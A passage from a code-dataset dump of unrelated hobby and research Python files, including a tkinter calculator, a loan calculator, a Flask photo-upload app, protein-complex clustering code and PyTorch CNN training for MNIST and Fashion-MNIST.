\n#==============================================================","repo_name":"ErunamoJAZZ/Visor-Unal","sub_path":"src/EngineGlobal.py","file_name":"EngineGlobal.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6793842789","text":"# import the necessary packages\nimport imutils\nimport cv2\nimport numpy as np\nfrom collections import namedtuple\nimport numpy as np\nimport cv2\n\ndef pyramid(image, scale=1.5, minSize=(30, 30)):\n\t# yield the original image\n\tyield image\n\n\t# keep looping over the pyramid\n\twhile True:\n\t\t# compute the new dimensions of the image and resize it\n\t\tw = int(image.shape[1] / scale)\n\t\timage = imutils.resize(image, width=w)\n\n\t\t# if the resized image does not meet the supplied minimum\n\t\t# size, then stop constructing the pyramid\n\t\tif image.shape[0] < minSize[1] or image.shape[1] < minSize[0]:\n\t\t\tbreak\n\n\t\t# yield the next image in the pyramid\n\t\tyield image\n\ndef sliding_window(image, stepSize, windowSize):\n\t# slide a window across the image\n\tfor y in xrange(0, image.shape[0], stepSize):\n\t\tfor x in xrange(0, image.shape[1], stepSize):\n\t\t\t# yield the current window\n\t\t\tyield (x, y, image[y:y + windowSize[1], x:x + windowSize[0]])\n\ndef orientations(image):\n\n\trows,cols = image.shape\n\tfor theta in range(0, 360, 45):\n\t\tM = cv2.getRotationMatrix2D((cols/2,rows/2),theta,1)\n\t\timage = cv2.warpAffine(image,M,(cols,rows))\n\t\tyield image\n\ndef find_nn(gt,pick):\n\tdist = []\n\tfor (startX, 
startY, endX, endY) in pick:\n\t\tdist = np.append(dist,[np.sqrt(np.square(startX-gt[0,0])+np.square(startY-gt[0,1]))])\n\tidx = np.argmin(dist)\n\treturn pick[idx]\n\ndef bb_intersection_over_union(boxA, boxB):\n\t# determine the (x, y)-coordinates of the intersection rectangle\n\txA = max(boxA[0], boxB[0,0])\n\tyA = max(boxA[1], boxB[0,1])\n\txB = min(boxA[2], boxB[0,2])\n\tyB = min(boxA[3], boxB[0,3])\n\n\t# compute the area of intersection rectangle\n\tinterArea = (xB - xA + 1) * (yB - yA + 1)\n\n\t# compute the area of both the prediction and ground-truth\n\t# rectangles\n\tboxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)\n\tboxBArea = (boxB[0,2] - boxB[0,0] + 1) * (boxB[0,3] - boxB[0,1] + 1)\n\n\t# compute the intersection over union by taking the intersection\n\t# area and dividing it by the sum of prediction + ground-truth\n\t# areas - the interesection area\n\tiou = interArea / float(boxAArea + boxBArea - interArea)\n\n\t# return the intersection over union value\n\treturn iou","repo_name":"nihaarshah/RadarObjectDetection","sub_path":"code/sliding-window/pyimagesearch/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33682335147","text":"import tkinter as tk\n\ndef add_digit(digit):\n value = calc.get()#принимает значение, которое хранится в вводе\n if value[0] == '0' and len(value) == 1:#если 1-ое значение - 0 И длина значения = 1\n value = value[1:]#то этот 0 убирается\n calc.delete(0, tk.END)\n calc.insert(0, value + digit)\n\ndef add_operation(operation):\n value = calc.get()\n if value[-1] in '-+/*':#если последнее значение является операцией, то эту о��ерацию должны убрать из value, т.е. 
все что там лежит КРОМЕ последней операции\n value = value[:-1]\n elif '+' in value or '-' in value or '/' in value or '*' in value:#НО если или + или - или / или * уже есть в предыдущем выражении\n calculate()#то оно уже считывается\n value = calc.get()#и вновь получаем новое значение\n calc.delete(0, tk.END)#всё что было - очищаем\n calc.insert(0, value + operation)#к значению прибавляем новую операцию\n\ndef calculate():#функция содана для кнопки = для вычисления\n value = calc.get()#принимает значение, которое хранится в вводе\n if value[-1] in '+-/*':#если значение заканчивается на какую-то операцию \n value = value + value[:-1]#то к этому значению \"прибавляем\" это же значение(пример 7* = 49)\n calc.delete(0, tk.END)\n calc.insert(0, eval(value))#eval - функция для выполнения математических операций\n\ndef clear():#функция очищения\n calc.delete(0, tk.END)\n calc.insert(0, 0)\n\ndef make_digit_button(digit):#функция создана для кнопок от 1 до 9 и 0\n return tk.Button(text = digit, bd = 5, font = ('Arial', 13), command = lambda : add_digit(digit))\n\ndef make_operation_button(operation):#функция создана для кнопок операций\n return tk.Button(text = operation, bd = 5, font = ('Arial', 13), fg = 'red',\n command = lambda : add_operation(operation))\n\ndef make_calc_button(operation):#фунция создана для =\n return tk.Button(text = operation, bd = 5, font = ('Arial', 13), fg = 'red',\n command = calculate)\n\ndef make_clear_button(operation):#функция создана для кнопки очищения\n return tk.Button(text = operation, bd = 5, font = ('Arial', 13), fg = 'red',\n command = clear)\n \n\nwin = tk.Tk()\nwin.geometry(f\"240x270\")#размер окна\nwin['bg'] = '#33ffe6'#цвет фона(бирюзовый)\nwin.title('Калькулятор')#заголовок приложения\n\ncalc = tk.Entry(win, justify = tk.RIGHT, font = ('Arial', 15), width = 15)#создание поля ввода; создана функция justify для ввода чисел и знаков справа, указан шрифт и её размер\ncalc.insert(0, '0')#при запуске приложения и при очищении поля ввода будет отображаться 0 в виде строки \ncalc.grid(row = 0, column = 0, columnspan = 4, stick = 'we', padx = 5)#расположение поля ввода(его ряд и колонка), объединение колонок, растягивание слева направо и расстояние по x\n\n#кнопки от 1 до 9 и 0; для каждой кнопки указан текст, ряд, колонка, расширение и расстояние между ними\nmake_digit_button('1').grid(row = 1, column = 0, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('2').grid(row = 1, column = 1, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('3').grid(row = 1, column = 2, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('4').grid(row = 2, column = 0, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('5').grid(row = 2, column = 1, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('6').grid(row = 2, column = 2, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('7').grid(row = 3, column = 0, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('8').grid(row = 3, column = 1, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('9').grid(row = 3, column = 2, stick = 'wens', padx =5, pady = 5)\nmake_digit_button('0').grid(row = 4, column = 0, stick = 'wens', padx =5, pady = 5)\n\n#кнопки операций +-/*; для каждой кнопки указан текст, ряд, колонка, расширение и расстояние между ними\nmake_operation_button('+').grid(row = 1, column = 3, stick = 'wens', padx = 5, pady = 5)\nmake_operation_button('-').grid(row = 2, column = 3, stick = 'wens', padx = 5, pady = 5)\nmake_operation_button('/').grid(row = 3, column = 3, stick = 'wens', padx = 5, pady = 
5)\nmake_operation_button('*').grid(row = 4, column = 3, stick = 'wens', padx = 5, pady = 5)\n\n#кнопка вычисления =; для этой кнопки указан текст, ряд, колонка, расширение и расстояние между ними\nmake_calc_button('=').grid(row = 4, column = 2, stick = 'wens', padx = 5, pady = 5)\n\n#кнопка очищения поля ввода; для этой кнопки указан текст, ряд, колонка, расширение и расстояние между ними\nmake_clear_button('C').grid(row = 4, column = 1, stick = 'wens', padx = 5, pady = 5)\n\n#колонки будут занимать больше пространства по высоте и по длине\nwin.grid_columnconfigure(0, minsize = 60)\nwin.grid_columnconfigure(1, minsize = 60)\nwin.grid_columnconfigure(2, minsize = 60)\nwin.grid_columnconfigure(3, minsize = 60)\n\n#ряды будут занимать больше пространства по высоте и по длине\nwin.grid_rowconfigure(1, minsize = 60)\nwin.grid_rowconfigure(2, minsize = 60)\nwin.grid_rowconfigure(3, minsize = 60)\nwin.grid_rowconfigure(4, minsize = 60)\n\nwin.mainloop()\n","repo_name":"Ancienttttttttttt/ReCalculator","sub_path":"ReCalc.py","file_name":"ReCalc.py","file_ext":"py","file_size_in_byte":6409,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14388049038","text":"def main():\n    print(\"This is a monthly payment loan calculator.\\n\")\n    \n    principal = float(input(\"Input the loan amount: \"))\n    apr = float(input(\"Input the annual interest rate: \"))\n    years = int(input(\"Input amount of years: \"))\n    \n    monthly_interest_rate = apr / 1200\n    months = years * 12\n    monthly_payment = (principal * monthly_interest_rate) / (1 - (1 + monthly_interest_rate) ** (-months))\n    print(\"%.2f\" %monthly_payment)\n    \n    \nmain()","repo_name":"Tharindu-Dasantha/CS","sub_path":"projects/20_projects/monthly_payment_calculator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37447119090","text":"# -*- coding=utf-8 -*-\n# @Time : 2022/8/18 16:35\n# @Author : Scotty1373\n# @File : test.py\n# @Software : PyCharm\nstd_in = '5 cats dog sand and cat catsandog'\n\nmax_lens = 4\nres_lens = 3\niss_score = [445, 754, 553, 122]\niss_prob = [89, 38, 76, 23]\n\ndef max_scores(max_lens, res_lens, iss_score, iss_prob):\n    # 创建dp矩阵\n    dp = [0 for i in range(max_lens)]\n\n    mapping = []\n    for i in range(len(iss_score)):\n        mapping.append([iss_score[i], iss_prob[i]])\n\n    # 按iss_score排序,并映射到iss_prob上\n    sorted_id = mapping.sort(key=lambda x: x[0], reverse=True)\n\n    counter = 0\n    while counter < max_lens:\n        if not counter:\n            dp[counter] = mapping[counter][0]\n        elif counter < res_lens:\n            dp[counter] = mapping[counter][0] + dp[counter - 1]\n        else:\n            dp[counter] = mapping[counter][0] * mapping[counter][1] / 100 + dp[counter - 1]\n        counter += 1\n\n    print(f'{dp[-1]:.2f}')\n\nsub_str = 'redrde'\n\ndef getSubstringWithEqual012(string):\n    N = len(string)\n\n    # map to store, how many times a difference\n    # pair has occurred previously\n    mp = dict()\n    mp[(0, 0)] = 1\n\n    # zc (Count of zeroes), oc(Count of 1s)\n    # and tc(count of twos)\n    # In starting all counts are zero\n    zc, oc, tc = 0, 0, 0\n\n    # looping into string\n    res = 0  # Initialize result\n    for i in range(N):\n\n        # increasing the count of current character\n        if string[i] == 'r':\n            zc += 1\n        elif string[i] == 'e':\n            oc += 1\n        else:\n            tc += 1  # Assuming that string doesn't contain\n                     # other characters\n\n        # making pair of differences (z[i] - o[i],\n        # z[i] - t[i])\n        tmp = (zc - oc, zc - tc)\n\n        # Count of previous occurrences of 
above pair\n # indicates that the subarrays forming from\n # every previous occurrence to this occurrence\n # is a subarray with equal number of 0's, 1's\n # and 2's\n if tmp not in mp:\n res += 0\n else:\n res += mp[tmp]\n\n # increasing the count of current difference\n # pair by 1\n if tmp in mp:\n mp[tmp] += 1\n else:\n mp[tmp] = 1\n\n return res\n\n\nmax_lt_lens = 5\nselect_lens = 2\nlt = [2, 3, 4, 5, 6]\n\ndef subarrayBitwiseANDs(A, max, sele):\n dp = [0 for i in range(10)]\n offset = 1\n for idx in range(max):\n for b in A:\n dp[idx] += 1 if b & offset else 0\n offset <<= 1\n dp.reverse()\n\n\ncity_num = 5\ncost_max = 3\ncity_cost = [(1, 3), (2, 1), (5, 2), (3, 1), (4, 3)]\n\ndef max_happy(cn, cm, cc):\n dp = [0] * (cn - cm + 1)\n city_cost.sort(key=lambda x: x[0])\n ptr_l, ptr_r = 0, cm - 1\n\n def cal_cost(left, right):\n cost = 0\n for i in range(left, right+1):\n cost += city_cost[i][1]\n return cost\n\n counter = 0\n max_hp = 0\n while ptr_r <= len(city_cost) - 1:\n happy_val = cal_cost(ptr_l, ptr_r)\n max_hp = max(happy_val, max_hp)\n dp[counter] = happy_val\n ptr_l += 1\n ptr_r += 1\n counter += 1\n print(max_hp)\n\n\n\nif __name__ == '__main__':\n # max_scores(max_lens, res_lens, iss_score, iss_prob)\n # print(getSubstringWithEqual012(sub_str))\n # subarrayBitwiseANDs(lt, max_lt_lens, select_lens)\n max_happy(city_num, cost_max, city_cost)","repo_name":"scotty1373/multiagent-ship","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15346942578","text":"# Sortieren\nnames = [\"Dieter\", \"Bernd\", \"Martin\"]\nprint(names, id(names))\n\nnames.sort()\nprint(names, id(names))\n\n# Aufsteigend Sortieren\nnumbers = [12, 3, 4, 99, 2, 0.2]\nnumbers.sort()\nprint(numbers)\n\n# Absteigend Sortieren\nnumbers = [12, 3, 4, 99, 2, 0.2]\nnumbers.sort(reverse=True)\nprint(numbers)\n\n# 2D Listen\npersonen = [\n [\"Arne\", \"Dudel\"],\n [\"Ali Ibrahim\", \"Yilmaz\"],\n [\"Deniz\", \"Gürzoglu\"]\n]\npersonen.sort()\nprint(personen)\n\n","repo_name":"aliibrahimyilmaz/Data_Science","sub_path":"02_Data_ANALYSIS_w_PYTHON/Python_Fundamentals/woche_1/tag_3/listen_3.py","file_name":"listen_3.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10294791795","text":"import sys\nimport re\nimport os\nimport numpy as np\nimport pandas as pd\nfrom scipy import cluster\nimport uuid\n\n\nimport PCprophet.stats_ as st\nimport PCprophet.io_ as io\n\n\n# standardize and center methods\ndef center_arr(hoa, fr_nr=\"all\", norm=True, nat=True, stretch=(True, 72)):\n hypo = {}\n for k in hoa:\n key = hoa[k]\n if fr_nr != \"all\":\n key = key[0:(fr_nr)]\n if len([x for x in key if x > 0]) < 2:\n continue\n key = st.gauss_filter(key, sigma=1, order=0)\n key = st.impute_namean(key)\n if stretch[0]:\n # input original length wanted length\n key = st.resample(key, len(key), output_fr=stretch[1])\n key = st.resize(key)\n hypo[k] = list(key)\n return hypo\n\n\ndef split_peaks(prot_arr, pr, skp=0):\n \"\"\"\n split peaks in n samples giving skp fractions of window\n returns\n 'right_bases': array([32]), 'left_bases': array([7])\n \"\"\"\n peaks = list(st.peak_picking(prot_arr))\n left_bases = peaks[1][\"left_bases\"]\n right_bases = peaks[1][\"right_bases\"]\n fr_peak = peaks[0]\n ret = {}\n # if no return value or 1 peak\n if len(fr_peak) < 2:\n ret[pr] = prot_arr\n return ret\n 
for idx, pk in enumerate(fr_peak):\n        if pk < 6 or pk > 69:\n            continue\n        nm = \"_\".join([pr, str(idx)])\n        clean = fill_zeroes(prot_arr, pk, left_bases[idx], right_bases[idx])\n        ret[nm] = clean\n    return ret\n\n\ndef fill_zeroes(prot, pk, left_base, right_base):\n    \"\"\"\n    check left and right side of peaks and zero if >\n    \"\"\"\n    arr = prot.copy()\n    arr[:left_base] = [0 for aa in arr[:left_base]]\n    arr[right_base:] = [0 for aa in arr[right_base:]]\n    right = zero_sequence(arr[pk : len(arr)])\n    left = zero_sequence(arr[:pk][::-1])[::-1]\n    return left + right\n\n\ndef zero_sequence(arr):\n    idx = 0\n    k = True\n    while k:\n        # if we are at end return array\n        if idx == len(arr) - 1:\n            return arr\n        # if current value smaller than next (i.e increasing)\n        elif arr[idx] < arr[(idx + 1)]:\n            # slice until there\n            tmp = arr[:idx]\n            l = [0] * (len(arr) - len(tmp))\n            return tmp + l\n        idx += 1\n\n\ndef decondense(df, ids):\n    \"\"\"\n    decondense a linkage matrix into all flat clusters\n    \"\"\"\n    clusters = {}\n    rows = cluster.hierarchy.linkage(df)\n    lab = dict(zip(range(len(ids) + 1), ids))\n    for row in range(rows.shape[0]):\n        cluster_n = row + len(ids)\n        glob1, glob2 = rows[row, 0], rows[row, 1]\n        current = []\n        for glob in [glob1, glob2]:\n            if glob > (len(ids) - 1):\n                current += clusters[glob]\n            else:\n                current.append(lab[int(glob)])\n        clusters[cluster_n] = current\n    return clusters\n\n\ndef format_cluster(hoa, clust):\n    out = {}\n    lk = {k: \",\".join(map(str, v)) for k, v in hoa.items()}\n    for gn in clust.values():\n        if len(gn) > 1 and len(gn) <= 100:\n            gn = [x if x in lk else re.sub(\"_\\d+$\", \"\", x) for x in gn]\n            out[\"#\".join(gn)] = [\"#\".join([lk[x] for x in gn])]\n    return out\n\n\ndef collapse_prot(infile, use):\n    prot = io.read_txt(infile, \"GN\")\n    prot = center_arr(prot, fr_nr=use, stretch=(True, 72))\n    prot2 = {}\n    for pr in prot:\n        pks = split_peaks(prot[pr], pr)\n        if pks:\n            for k in pks:\n                prot2[k] = pks[k]\n    pr_df = io.create_df(prot2)\n    z = decondense(pr_df, list(pr_df.index))\n    hypothesis = format_cluster(prot, z)\n    hypo_df = pd.DataFrame.from_dict(hypothesis).T\n    hypo_df[\"ID\"] = [\"cmplx_\" + str(uuid.uuid4()) for x in list(hypo_df.index)]\n    # return peaks2prot(hypothesis, prot),pr_df\n    return hypo_df, pr_df\n\n\ndef runner(infile, hypothesis, use_fr):\n    \"\"\"\n    generate hypothesis from infile using all fract fractions and max hypo nr\n    \"\"\"\n    if hypothesis == \"all\":\n        print(\"Generating hypothesis for \" + infile)\n        hypo, df_s = collapse_prot(infile=infile, use=use_fr)\n        base = io.file2folder(infile, prefix=\"./tmp/\")\n        # nm = os.path.join(base, \"hypo.txt\")\n        hypo.reset_index(inplace=True)\n        hypo.columns = [\"MB\", \"FT\", \"ID\"]\n        hypo = hypo[[\"ID\", \"MB\", \"FT\"]]\n        hypo.to_csv(os.path.join(base, \"hypo.txt\"), sep=\"\\t\", index=False)\n        # io.wrout(hypo, nm, [\"ID\", \"MB\", \"FT\"], is_hyp=True)\n        df_s.to_csv(os.path.join(base, \"splitted_transf.txt\"), sep=\"\\t\")\n        return True\n    else:\n        pass\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"anfoss/PCprophet","sub_path":"PCprophet/hypothesis.py","file_name":"hypothesis.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"2415653167","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef scatter_plot(X, y, theta, fname=\"lr-scatter.pdf\"):\n    \"\"\"Plot the data and its linear regression model.\"\"\"\n    plt.clf()\n    plt.plot(X[:, 1], y, \"o\")\n    x_e = np.array([[1, X[:, 1].min()], [1, 
X[:, 1].max()]])\n    plt.plot(x_e[:, -1], x_e.dot(theta))\n    plt.savefig(fname)\n    plt.close()\n\n\ndef gradient_descent(X, y, alpha=0.001, epochs=1000, trace=False):\n    \"\"\"For a matrix x and vector y return a linear regression model.\"\"\"\n    theta = np.zeros(X.shape[1])\n    for i in range(epochs):\n        theta = theta - alpha * (X.dot(theta) - y).dot(X)\n        if trace and (i % 10 == 0):\n            scatter_plot(X, y, theta, fname=\"tmp/%03d.pdf\" % i)\n    return theta\n\n\ndata = np.loadtxt(\"linear-0.txt\")\nX_train = data[:, 0:-1]\nX_train = np.column_stack((np.ones(len(X_train)), X_train))\ny_train = data[:, -1]\ntheta_star = gradient_descent(X_train, y_train)\n\nscatter_plot(X_train, y_train, theta_star)\n","repo_name":"BlazZupan/uozp-zapiski","sub_path":"gradivo/linear-regression-basic.py","file_name":"linear-regression-basic.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"30808369229","text":"from flask import Flask, jsonify, render_template\nimport json\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n    with open(\"./static/data/basic_data_processed.json\", 'r') as load_f:\n        load_dict = json.load(load_f)\n    people = load_dict\n    with open('./static/data/china-geo.json', 'r') as load_m:\n        load_map = json.load(load_m)\n    china = load_map\n    return render_template('index.html', people=people, china=china)\n\n\n@app.route(\"/people/<person_name>\")\ndef people(person_name):\n    a = u'./static/data/person/'+person_name+'.csv'\n    ls = []\n    with open(a, 'r') as fo:\n        for line in fo:\n            line = line.replace(\"\\n\", \"\")\n            ls.append(line.split(\",\"))\n    for i in range(1, len(ls)):\n        ls[i] = dict(zip(ls[0], ls[i]))\n    return jsonify(ls[1:])\n\n\nif __name__ == '__main__':\n    app.run()\n\n\n","repo_name":"Angeladadd/DataVizOfCPCCentralCommittee","sub_path":"孙晨鸽_516030910421_0428_src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14449142142","text":"import os\nimport socket\nfrom flask import Flask, jsonify, render_template, request, redirect, url_for, send_from_directory, flash\nfrom flask_uploads import IMAGES, UploadSet, configure_uploads\n\napp = Flask(__name__)\nphotos=UploadSet(\"photos\", IMAGES)\napp.config['UPLOADED_PHOTOS_DEST'] = '/mnt/azure'\napp.config[\"SECRET_KEY\"] = os.urandom(24)\nconfigure_uploads(app, photos)\n\n# Function to fetch hostname and IP address\ndef fetchDetails():\n    hostname = socket.gethostname()\n    addr = socket.gethostbyname(hostname)\n    return str(hostname), str(addr)\n\n@app.route(\"/\")\ndef hello_world():\n    return \"
<html><body><h1>Hello, World!</h1></body></html>
    \"\n\n@app.route(\"/health\")\ndef health():\n return jsonify(\n status=\"UP\"\n )\n\n@app.route(\"/details\")\ndef details():\n hostname, addr = fetchDetails()\n return render_template('index.html', hostname=hostname, IP=addr)\n\n@app.route(\"/upload\", methods=['GET', 'POST'])\ndef upload():\n if request.method == 'POST' and 'photo' in request.files:\n photos.save(request.files['photo'])\n flash(\"Photo saved successfully.\")\n return render_template('upload.html')\n return render_template('upload.html')\n\n@app.route('/upload/')\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOADED_PHOTOS_DEST'], filename)\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000, debug=True)\n","repo_name":"vmahdych/devops-python","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9482899109","text":"import numpy as np\nimport torch.optim as optim\nimport torch\nimport torch.nn as nn\nimport os\nimport matplotlib.pyplot as plt\nimport torchvision\nimport torchvision.transforms as transforms\nfrom typing import Tuple, Dict, List\n\nfrom utils import get_data_loader\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\ndef get_model(model_type, input_shape, num_classes):\n # Check if the specified model type is simple or complex\n if model_type == 'simple':\n # Define the simple CNN model\n model = nn.Sequential(\n nn.Conv2d(in_channels=input_shape[0], out_channels=32, kernel_size=3, stride=1, padding=1),\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, stride=1, padding=1),\n nn.MaxPool2d(kernel_size=2, stride=2),\n nn.MaxPool2d(kernel_size=2, stride=2),\n nn.Flatten(),\n nn.Linear(in_features=7*7*64, out_features=128),\n nn.Linear(in_features=128, out_features=num_classes)\n )\n elif model_type == 'complex':\n # Define the complex CNN model\n model = nn.Sequential(\n nn.Conv2d(in_channels=input_shape[0], out_channels=32, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(num_features=32),\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, stride=1, padding=1),\n nn.Conv2d(in_channels=64, out_channels=64, kernel_size=3, stride=1, padding=1, groups=64),\n nn.MaxPool2d(kernel_size=2, stride=2),\n nn.MaxPool2d(kernel_size=2, stride=2),\n nn.Flatten(),\n nn.Linear(in_features=7*7*64, out_features=128),\n nn.Linear(in_features=128, out_features=num_classes)\n )\n else:\n raise ValueError('Invalid model type')\n return model\n\ndef save_models(models: Tuple[nn.Module, nn.Module, nn.Module, nn.Module], directory: str) -> None:\n \"\"\"Saves the given CNN models to the specified directory.\n\n Args:\n models: A tuple of the 4 trained CNN models (simple MNIST, complex MNIST, simple Fashion-MNIST, complex Fashion-MNIST).\n directory: The directory to save the models to.\n\n Returns:\n None. 
The models are saved to disk.\n \"\"\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n simple_mnist_model, complex_mnist_model, simple_fmnist_model, complex_fmnist_model = models\n\n torch.save(simple_mnist_model.state_dict(), os.path.join(directory, \"simple_mnist_model.pt\"))\n torch.save(complex_mnist_model.state_dict(), os.path.join(directory, \"complex_mnist_model.pt\"))\n torch.save(simple_fmnist_model.state_dict(), os.path.join(directory, \"simple_fmnist_model.pt\"))\n torch.save(complex_fmnist_model.state_dict(), os.path.join(directory, \"complex_fmnist_model.pt\"))\n\n\ndef load_models(directory):\n # Load the trained models\n if torch.cuda.is_available():\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n \n simple_mnist_model = get_model('simple',(1, 28, 28), 10)\n complex_mnist_model= get_model('complex',(1, 28, 28), 10)\n simple_fmnist_model = get_model('simple',(1, 28, 28), 10)\n complex_fmnist_model= get_model('complex',(1, 28, 28), 10)\n simple_mnist_model.load_state_dict(torch.load(f'{directory}/simple_mnist_model.pt', map_location=device))\n complex_mnist_model.load_state_dict(torch.load(f'{directory}/complex_mnist_model.pt', map_location=device))\n simple_fmnist_model.load_state_dict(torch.load(f'{directory}/simple_fmnist_model.pt', map_location=device))\n complex_fmnist_model.load_state_dict(torch.load(f'{directory}/complex_fmnist_model.pt', map_location=device))\n return simple_mnist_model, complex_mnist_model, simple_fmnist_model, complex_fmnist_model\n\n\ndef train(model, train_loader, valid_loader, num_epochs=100, early_stopping_patience=5, lr_min=1e-4, lr_max=1e-2, weight_decay=1e-4):\n \"\"\"Trains a PyTorch model with cosine annealing learning rate scheduling and early stopping.\n\n Args:\n model: The model to be trained (a PyTorch nn.Module).\n train_loader: A PyTorch DataLoader for the training data.\n valid_loader: A PyTorch DataLoader for the validation data.\n num_epochs: The number of epochs to train for (default 100).\n early_stopping_patience: The number of epochs to wait for a improvement in validation accuracy before stopping training (default 5).\n lr_min: The minimum learning rate (default 1e-4).\n lr_max: The maximum learning rate (default 1e-2).\n weight_decay: The weight decay for the Adam optimizer (default 1e-4).\n\n Returns:\n The trained model (a PyTorch nn.Module).\n \"\"\"\n # Load the trained models\n if torch.cuda.is_available():\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n\n # Define the Adam optimizer\n optimizer = optim.Adam(model.parameters(), lr=lr_max, weight_decay=weight_decay)\n\n # Set the initial learning rate and the learning rate scheduler\n lr_scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, num_epochs, lr_min)\n\n # Set the criterion (loss function)\n criterion = nn.CrossEntropyLoss()\n\n # Set the number of epochs to train for and the early stopping patience\n num_epochs_to_train = num_epochs\n early_stopping_counter = 0\n\n # Set the best validation accuracy to 0\n best_valid_acc = 0.0\n\n # Set the model to training mode\n model.train()\n\n # Loop over the number of epochs\n for epoch in range(num_epochs):\n # Set the loss and accuracy for the epoch to 0\n epoch_loss = 0.0\n epoch_acc = 0.0\n # Define the device\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # Move the model to the device\n model = model.to(device)\n\n # Loop over the training data\n for data, target in train_loader:\n # Move the data and target to 
the device\n data, target = data.to(device), target.to(device)\n\n # Zero the gradients\n optimizer.zero_grad()\n\n # Forward pass\n output = model(data)\n loss = criterion(output, target)\n\n # Backward pass\n loss.backward()\n optimizer.step()\n\n # Update the loss and accuracy for the epoch\n epoch_loss += loss.item()\n epoch_acc += (output.argmax(1) == target).float().mean().item()\n\n # Update the learning rate\n lr_scheduler.step()\n\n # Set the model to evaluation mode\n model.eval()\n\n # Set the validation loss and accuracy for the epoch to 0\n valid_loss = 0.0\n valid_acc = 0.0\n\n # Turn off gradients for validation\n with torch.no_grad():\n # Loop over the validation data\n for data, target in valid_loader:\n # Move the data and target to the device\n data, target = data.to(device), target.to(device)\n\n # Forward pass\n output = model(data)\n loss = criterion(output, target)\n\n # Update the validation loss and accuracy for the epoch\n valid_loss += loss.item()\n valid_acc += (output.argmax(1) == target).float().mean().item()\n\n # Calculate the average loss and accuracy for the epoch\n epoch_loss /= len(train_loader)\n epoch_acc /= len(train_loader)\n valid_loss /= len(valid_loader)\n valid_acc /= len(valid_loader)\n\n # Print the epoch\n # Print the training and validation results for the epoch\n print(f\"Epoch: {epoch+1:2d} | \"\n f\"Train Loss: {epoch_loss:.4f} | \"\n f\"Train Acc: {epoch_acc*100:.1f}% | \"\n f\"Valid Loss: {valid_loss:.4f} | \"\n f\"Valid Acc: {valid_acc*100:.1f}%\")\n\n # If the current model has the best validation accuracy, update the best validation accuracy and reset the early stopping counter\n if valid_acc > best_valid_acc:\n best_valid_acc = valid_acc\n early_stopping_counter = 0\n # If the current model does not have the best validation accuracy, increment the early stopping counter\n else:\n early_stopping_counter += 1\n\n # If the early stopping counter has reached the early stopping patience, stop training\n if early_stopping_counter >= early_stopping_patience:\n num_epochs_to_train = epoch + 1\n break\n\n # Return the trained model\n return model\n\ndef train_all_models(\n train_batch_size: int,\n num_epochs: int = 100,\n early_stopping_patience: int = 5,\n lr_min: float = 1e-4,\n lr_max: float = 1e-2,\n weight_decay: float = 1e-4,) -> Tuple[nn.Module, nn.Module, nn.Module, nn.Module]:\n # Load the MNIST and Fashion-MNIST datasets\n mnist_train, mnist_valid, mnist_test = get_data_loader(\"mnist\", train_batch_size, shuffle=True, num_workers=4, pin_memory=False)\n fmnist_train, fmnist_valid, fmnist_test = get_data_loader(\"fashion-mnist\", train_batch_size, shuffle=True, num_workers=4, pin_memory=False)\n \n # List of models to train\n models_to_train = [\n (\"simple\", \"mnist\", mnist_train, mnist_valid),\n (\"complex\", \"mnist\", mnist_train, mnist_valid),\n (\"simple\", \"fashion-mnist\", fmnist_train, fmnist_valid),\n (\"complex\", \"fashion-mnist\", fmnist_train, fmnist_valid),\n ]\n \n # Train all models\n trained_models = []\n for model_type, dataset, train_data, valid_data in models_to_train:\n print(f\"Training {model_type} model on {dataset}...\")\n # Get the appropriate model\n input_shape, num_classes = (1, 28, 28), 10\n model = get_model(model_type, input_shape, num_classes)\n # Train the model\n model = train(model, train_data, valid_data, num_epochs=num_epochs, early_stopping_patience=early_stopping_patience, 